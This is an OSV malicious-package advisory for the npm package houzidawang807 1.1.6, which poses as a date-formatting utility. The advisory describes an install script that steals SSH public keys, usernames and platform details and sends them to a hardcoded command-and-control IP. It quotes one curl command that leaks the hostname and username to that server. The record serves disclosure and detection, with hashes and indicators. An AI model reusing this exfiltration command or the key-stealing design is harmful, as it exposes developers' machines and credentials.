MAL-2026-5731

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/houzidawang807/MAL-2026-5731.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5731
Published
2026-06-13T06:51:41Z
Modified
2026-06-13T07:31:43.703859774Z
Summary
Malicious code in houzidawang807 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (7568d90e7a8d940b5618fa36bccfc2b7fa02ceaa814f0a416d2cc989c685e489)

Package advertises itself as 'a simple date formatting utility' but ships an SSH-key-stealing C2 client. postinstall.js enumerates ~/.ssh for *.pub files, collects the installer's username and platform, and POSTs a JSON payload over HTTPS to the hardcoded bare IP 124.221.154.135. Source comments explicitly label this destination as the attacker's C2 server. package.json additionally declares a build script that curls http://124.221.154.135/pre?h=$(hostname)&u=$(whoami), leaking host identifiers in plaintext to the same C2. The legitimate-looking surface is a 3-line formatDate wrapper in index.js; the rest of the package is attack tooling. Although the malicious file is named postinstall.js, it is not currently wired into a lifecycle hook (scripts only declares build), so default npm install does not auto-execute it — however, the file is loaded by any consumer that requires the package or invokes the build script, and the file's name strongly suggests the author intends to enable it as a lifecycle hook in a follow-up version.

Database specific 
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006305",
            "import_time": "2026-06-13T07:25:38.440254257Z",
            "sha256": "7568d90e7a8d940b5618fa36bccfc2b7fa02ceaa814f0a416d2cc989c685e489",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T06:51:41Z",
            "versions": [
                "1.1.6"
            ]
        },
        {
            "id": "IN-MAL-2026-006306",
            "versions": [
                "1.1.6"
            ],
            "sha256": "d87a9bdb30c6c4de17c6d4f01a94a84c0e597eee96f324082f880b9915c44498",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T06:51:42Z",
            "import_time": "2026-06-13T07:25:38.570142303Z"
        }
    ]
}
References
Credits

Affected packages

npm / houzidawang807

Package

Name
houzidawang807
View open source insights on deps.dev
Purl
pkg:npm/houzidawang807

Affected ranges

Affected versions

1.*
1.1.6

Database specific

cwes 
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators 
{
    "evidence_files": [
        {
            "path": "postinstall.js",
            "sha256": "01e2ae4c999c97c0deac72c7c36bbda5c0d81a95273d4cc5e7dd1dc6dc4596db",
            "tlsh": "033161d148f9ce304f3583952762c62af606fb23a106c640f7d80bea2fb299485d1ced"
        },
        {
            "path": "package.json",
            "sha256": "e721b12973f656430d0fef444292f2406109dcc93ef8d0d229372535cdbf5bd0",
            "tlsh": "1ce07d296f109c231bf082516d744b1bb9145f2f527c0c4bb17371086197a641068705"
        },
        {
            "path": "index.js",
            "sha256": "1d5404dbbd7f6a35142bc11e276bcff7b334f927a198399e6b0d9aa09ecfd098",
            "tlsh": "8cc08c94a716b2866326122096a74100be5cc2300b9a6a62b88ec0c00144c12805ef8c"
        }
    ],
    "package_integrity": [
        {
            "filename": "houzidawang807-1.1.6.tgz",
            "hashes": {
                "sha512_sri": "sha512-PRMbq5oBwQmIqH72r0lsFblInQfMoq29SGtqyjM51cjV9IwqRFSkZYAWhPE1hf+NrZwQkV+EvTI3OkK05MPtoQ==",
                "sha1": "6b19bae2d2e58544f2b233eb89718e61a2b13ebc"
            }
        }
    ],
    "ips": [
        "104.16.11.34"
    ]
}
source 
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/houzidawang807/MAL-2026-5731.json"